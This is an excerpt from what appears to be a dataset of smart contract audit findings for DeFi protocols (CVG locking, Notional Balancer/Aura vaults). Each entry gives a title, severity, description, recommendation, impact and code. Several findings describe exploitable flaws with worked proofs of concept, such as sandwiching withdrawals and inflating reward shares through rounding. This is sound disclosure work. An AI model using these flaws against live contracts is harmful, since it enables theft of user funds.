tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, \"TOO_MUCH_MG_TOKEN_ID_DELEGATED\");\\n```\\n -cvgControlTower and veCVG lock timing will be different and lead to yield loss scenariosчmediumчWhen creating a locked CVG position, there are two more or less independent locks that are created. The first is in lockingPositionService and the other is in veCVG. LockingPositionService operates on cycles (which are not finite length) while veCVG always rounds down to the absolute nearest week. The disparity between these two accounting mechanism leads to conflicting scenario that the lock on LockingPositionService can be expired while the lock on veCVG isn't (and vice versa). Additionally tokens with expired locks on LockingPositionService cannot be extended. The result is that the token is expired but can't be withdrawn. The result of this is that the expired token must wait to be unstaked and then restaked, cause loss of user yield and voting power while the token is DOS'd.\\nCycles operate using block.timestamp when setting lastUpdateTime on the new cycle in L345. It also requires that at least 7 days has passed since this update to roll the cycle forward in L205. The result is that the cycle can never be exactly 7 days long and the start/end of the cycle will constantly fluctuate.\\nMeanwhile when veCVG is calculating the unlock time it uses the week rounded down as shown in L328.\\nWe can demonstrate with an example:\\nAssume the first CVG cycle is started at block.timestamp == 1,000,000. This means our first cycle ends at 1,604,800. A user deposits for a single cycle at 1,400,000. A lock is created for cycle 2 which will unlock at 2,209,600.\\nThe lock on veCVG does not match this though. Instead it's calculation will yield:\\n```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n\\nAs seen these are mismatched and the token won't be withdrawable until much after it should be due to the check in veCVG L404.\\nThis DOS will prevent the expired lock from being unstaked and restaked which causes loss of yield.\\nThe opposite issue can also occur. For each cycle that is slightly longer than expected the veCVG lock will become further and further behind the cycle lock on lockingPositionService. This can also cause a dos and yield loss because it could prevent user from extending valid locks due to the checks in L367 of veCVG.\\nAn example of this:\\nAssume a user locks for 96 weeks (58,060,800). Over the course of that year, it takes an average of 2 hours between the end of each cycle and when the cycle is rolled over. This effectively extends our cycle time from 604,800 to 612,000 (+7200). Now after 95 cycles, the user attempts to increase their lock duration. veCVG and lockingPositionService will now be completely out of sync:\\nAfter 95 cycles the current time would be:\\n```\\n612,000 * 95 = 58,140,000\\n```\\n\\nWhereas veCVG lock ended:\\n```\\n612,000 * 96 = 58,060,800\\n```\\n\\nAccording to veCVG the position was unlocked at 58,060,800 and therefore increasing the lock time will revert due to L367\\nThe result is another DOS that will cause the user loss of yield. During this time the user would also be excluded from taking place in any votes since their veCVG lock is expired.чI would recommend against using block.timestamp for CVG cycles, instead using an absolute measurement like veCVG uses.чUnlock DOS that cause loss of yield to the userч```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n -SdtRewardReceiver#_withdrawRewards has incorrect slippage protection and withdraws can be sandwichedчmediumчThe _min_dy parameter of poolCvgSDT.exchange is set via the poolCvgSDT.get_dy method. The problem with this is that get_dy is a relative output that is executed at runtime. This means that no matter the state of the pool, this slippage check will never work.\\nSdtRewardReceiver.sol#L229-L236\\n```\\n if (isMint) {\\n /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n cvgSdt.mint(receiver, rewardAmount);\\n } else {\\n ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n }\\n```\\n\\nWhen swapping from SDT to cvgSDT, get_dy is used to set _min_dy inside exchange. The issue is that get_dy is the CURRENT amount that would be received when swapping as shown below:\\n```\\n@view\\n@external\\ndef get_dy(i: int128, j: int128, dx: uint256) -> uint256:\\n \"\"\"\\n @notice Calculate the current output dy given input dx\\n @dev Index values can be found via the `coins` public getter method\\n @param i Index value for the coin to send\\n @param j Index valie of the coin to recieve\\n @param dx Amount of `i` being exchanged\\n @return Amount of `j` predicted\\n \"\"\"\\n rates: uint256[N_COINS] = self.rate_multipliers\\n xp: uint256[N_COINS] = self._xp_mem(rates, self.balances)\\n\\n x: uint256 = xp[i] + (dx * rates[i] / PRECISION)\\n y: uint256 = self.get_y(i, j, x, xp, 0, 0)\\n dy: uint256 = xp[j] - y - 1\\n fee: uint256 = self.fee * dy / FEE_DENOMINATOR\\n return (dy - fee) * PRECISION / rates[j]\\n```\\n\\nThe return value is EXACTLY the result of a regular swap, which is where the problem is. There is no way that the exchange call can ever revert. Assume the user is swapping because the current exchange ratio is 1:1.5. Now assume their withdraw is sandwich attacked. The ratio is change to 1:0.5 which is much lower than expected. When get_dy is called it will simulate the swap and return a ratio of 1:0.5. This in turn doesn't protect the user at all and their swap will execute at the poor price.чAllow the user to set _min_dy directly so they can guarantee they get the amount they wantчSDT rewards will be sandwiched and can lose the entire balanceч```\\n if (isMint) {\\n /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n cvgSdt.mint(receiver, rewardAmount);\\n } else {\\n ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n }\\n```\\n -Division difference can result in a revert when claiming treasury yield and excess rewards to some usersчmediumчDifferent ordering of calculations are used to compute `ysTotal` in different situations. This causes the totalShares tracked to be less than the claimable amount of shares\\n`ysTotal` is calculated differently when adding to `totalSuppliesTracking` and when computing `balanceOfYsCvgAt`. When adding to `totalSuppliesTracking`, the calculation of `ysTotal` is as follows:\\n```\\n uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n\\nIn `balanceOfYsCvgAt`, `ysTotal` is calculated as follows\\n```\\n uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\n\\nThis difference allows the `balanceOfYsCvgAt` to be greater than what is added to `totalSuppliesTracking`\\nPOC\\n```\\n startCycle 357\\n endCycle 420\\n lockDuration 63\\n amount 2\\n ysPercentage 80\\n```\\n\\nCalculation in `totalSuppliesTracking` gives:\\n```\\n uint256 cvgLockAmount = (2 * 80) / 100; == 1\\n uint256 ysTotal = (63 * 1) / 96; == 0\\n```\\n\\nCalculation in `balanceOfYsCvgAt` gives:\\n```\\n uint256 ysTotal = ((63 * 2 * 80) / 100) / 96; == 10080 / 100 / 96 == 1\\n```\\n\\nExample Scenario\\nAlice, Bob and Jake locks cvg for 1 TDE and obtains rounded up `balanceOfYsCvgAt`. A user who is aware of this issue can exploit this issue further by using `increaseLockAmount` with small amount values by which the total difference difference b/w the user's calculated `balanceOfYsCvgAt` and the accounted amount in `totalSuppliesTracking` can be increased. Bob and Jake claims the reward at the end of reward cycle. When Alice attempts to claim rewards, it reverts since there is not enough reward to be sent.чPerform the same calculation in both places\\n```\\n+++ uint256 _ysTotal = (_extension.endCycle - _extension.cycleId)* ((_extension.cvgLocked * _lockingPosition.ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n--- uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\nчThis breaks the shares accounting of the treasury rewards. Some user's will get more than the actual intended rewards while the last withdrawals will result in a revertч```\\n uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n -Different spot prices used during the comparisonчhighчThe spot prices used during the comparison are different, which might result in the trade proceeding even if the pool is manipulated, leading to a loss of assets.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nLine 91 above calls the `SPOT_PRICE.getComposableSpotPrices` function to fetch the spot prices. Within the function, it relies on the `StableMath._calcSpotPrice` function to compute the spot price. Per the comments of this function, `spot price of token Y in token X` and `spot price Y/X` means that the Y (base) / X (quote). Thus, secondary (base) / primary (quote).\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n```\\n\\nThe above spot price will be used within the `_calculateLPTokenValue` function to compare with the oracle price to detect any potential pool manipulation. However, the oracle price returned is in primary (base) / secondary (quote) format. As such, the comparison between the spot price (secondary-base/primary-quote) and oracle price (primary-base/secondary-quote) will be incorrect.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _calculateLPTokenValue(\\n..SNIP..\\n uint256 price = _getOraclePairPrice(primaryToken, address(tokens[i]));\\n\\n // Check that the spot price and the oracle price are near each other. If this is\\n // not true then we assume that the LP pool is being manipulated.\\n uint256 lowerLimit = price * (Constants.VAULT_PERCENT_BASIS - limit) / Constants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = price * (Constants.VAULT_PERCENT_BASIS + limit) / Constants.VAULT_PERCENT_BASIS;\\n if (spotPrices[i] < lowerLimit || upperLimit < spotPrices[i]) {\\n revert Errors.InvalidPrice(price, spotPrices[i]);\\n }\\n```\\nчConsider verifying if the comment of the `StableMath._calcSpotPrice` function is aligned with its implementation with the Balancer team.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within the `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use the existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (ensure the fee is excluded) to compute the spot price.чIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.ч```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n -BPT LP Token could be sold off during re-investmentчmediumчBPT LP Token could be sold off during the re-investment process. BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vault\\nWithin the `ConvexStakingMixin._isInvalidRewardToken` function, the implementation ensures that the LP Token (CURVE_POOL_TOKEN) is not intentionally or accidentally sold during the reinvestment process.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the same control was not implemented for the Balancer/Aura code. As a result, it is possible for LP Token (BPT) to be sold during reinvestment. Note that for non-composable Balancer pools, the pool tokens does not consists of the BPT token. Thus, it needs to be explicitly defined within the `_isInvalidRewardToken` function.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\nчEnsure that the LP tokens cannot be sold off during re-investment.\\n```\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n// Add the line below\\n token == BALANCER_POOL_TOKEN ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n}\\n```\\nчLP tokens (BPT) might be accidentally or maliciously sold off by the bots during the re-investment process. BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vaultч```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n -Fewer than expected LP tokens if the pool is imbalanced during vault restorationчhighчThe vault restoration function intends to perform a proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. This results in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss for the vault shareholder.\\nPer the comment on Line 498, it was understood that the `restoreVault` function intends to deposit the withdrawn tokens back into the pool proportionally.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n\\nThe main reason to join with all the pool's tokens in exact proportions is to minimize the price impact or slippage of the join. If the deposited tokens are imbalanced, they are often swapped internally within the pool, incurring slippage or fees.\\nHowever, the concept of proportional join to minimize slippage does not always hold with the current implementation of the `restoreVault` function.\\nProof-of-Concept\\nAt T0, assume that a pool is perfectly balanced (50%-50%) with 1000 WETH and 1000 stETH.\\nAt T1, an emergency exit is performed, the LP tokens are redeemed for the underlying pool tokens proportionally, and 100 WETH and 100 stETH are redeemed\\nAt T2, certain events happen or due to ongoing issues with the pool (e.g., attacks, bugs, mass withdrawal), the pool becomes imbalanced (30%-70%) with 540 WETH and 1260 stETH.\\nAt T3, the vault re-enters the withdrawn tokens to the pool proportionally with 100 WETH and 100 stETH. Since the pool is already imbalanced, attempting to enter the pool proportionally (50% WETH and 50% stETH) will incur additional slippage and penalties, resulting in fewer LP tokens returned.\\nThis issue affects both Curve and Balancer pools since joining an imbalanced pool will always incur a loss.\\nExplantation of imbalance pool\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve Pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g. result in fewer Pool LP tokens received).\\nIn Curve Pool, there are penalties/bonuses when depositing to a pool. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). On the other hand, if a deposit deviates from the pool from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nFollowing is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.чConsider providing the callers the option to deposit the reward tokens in a \"non-proportional\" manner if a pool becomes imbalanced. For instance, the function could allow the caller to swap the withdrawn tokens in external DEXs within the `restoreVault` function to achieve the most optimal proportion to minimize the penalty and slippage when re-entering the pool. This is similar to the approach in the vault's reinvest function.чThere is no guarantee that a pool will always be balanced. Historically, there have been multiple instances where the largest curve pool (stETH/ETH) has become imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal, leading to the deposit resulting in fewer LP tokens than possible due to the deposit penalty or slippage due to internal swap.\\nThe side-effect is that the vault restoration will result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of assets for the vault shareholder.ч```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n -Rounding differences when computing the invariantчhighчThe invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe Balancer's Composable Pool codebase relies on the old version of the `StableMath._calculateInvariant` that allows the caller to specify if the computation should round up or down via the `roundUp` parameter.\\n```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n\\nWithin the `BalancerSpotPrice._calculateStableMathSpotPrice` function, the `StableMath._calculateInvariant` is computed rounding up per Line 90 below\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n```\\n\\nThe new Composable Pool contract uses a newer version of the StableMath library where the `StableMath._calculateInvariant` function always rounds down. Following is the StableMath.sol of one of the popular composable pools in Arbitrum that uses the new StableMath library\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n // Always round down, to match Vyper's arithmetic (which always truncates).\\n ..SNIP..\\n```\\n\\nThus, Notional rounds up when calculating the invariant, while Balancer's Composable Pool rounds down when calculating the invariant. This inconsistency will result in a different invariantчTo avoid any discrepancy in the result, ensure that the StableMath library used by Balancer's Composable Pool and Notional's leverage vault are aligned, and the implementation of the StableMath functions is the same between them.чThe invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.ч```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n -Incorrect scaling of the spot priceчhighчThe incorrect scaling of the spot price leads to the incorrect spot price, which is later compared with the oracle price.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nPer the comment and source code at Lines 97 to 103, the `SPOT_PRICE.getComposableSpotPrices` is expected to return the spot price in native decimals.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nWithin the `getComposableSpotPrices` function, it will trigger the `_calculateStableMathSpotPrice` function. When the primary and secondary balances are passed into the `StableMath._calculateInvariant` and `StableMath._calcSpotPrice` functions, they are scaled up to 18 decimals precision as StableMath functions only work with balances that have been normalized to 18 decimals.\\nAssuming that the following states:\\nPrimary Token = USDC (6 decimals)\\nSecondary Token = DAI (18 decimals)\\nPrimary Balance = 100 USDC (=100 * 1e6)\\nSecondary Balance = 100 DAI (=100 * 1e18)\\nscalingFactors[USDC] = 1e12 * Fixed.ONE (1e18) = 1e30\\nscalingFactors[DAI] = 1e0 * Fixed.ONE (1e18) = 1e18\\nThe price between USDC and DAI is 1:1\\nAfter scaling the primary and secondary balances, the scaled balances will be as follows:\\n```\\nscaledPrimary = balances[USDC] * scalingFactors[USDC] / BALANCER_PRECISION\\nscaledPrimary = 100 * 1e6 * 1e30 / 1e18\\nscaledPrimary = 100 * 1e18\\n\\nscaledSecondary = balances[DAI] * scalingFactors[DAI] / BALANCER_PRECISION\\nscaledSecondary = 100 * 1e18 * 1e18 / 1e18\\nscaledSecondary = 100 * 1e18\\n```\\n\\nThe spot price returned from the `StableMath._calcSpotPrice` function at Line 93 will be `1e18` (1:1).\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n\\n // Remove scaling factors from spot price\\n spotPrice = spotPrice * scalingFactors[primaryIndex] / scalingFactors[index2];\\n }\\n```\\n\\nSubsequently, in Line 96 above, the code attempts to remove the scaling factor from the spot price (1e18).\\n```\\nspotPrice = spotPrice * scalingFactors[USDC] / scalingFactors[DAI];\\nspotPrice = 1e18 * 1e30 / 1e18\\nspotPrice = 1e30\\nspotPrice = 1e12 * 1e18\\n```\\n\\nThe `spotPrice[DAI-Secondary]` is not denominated in native precision after the scaling. The `SPOT_PRICE.getComposableSpotPrices` will return the following spot prices:\\n```\\nspotPrice[USDC-Primary] = 0\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe returned spot prices will be scaled to POOL_PRECISION (1e18). After the scaling, the spot price remains the same:\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * 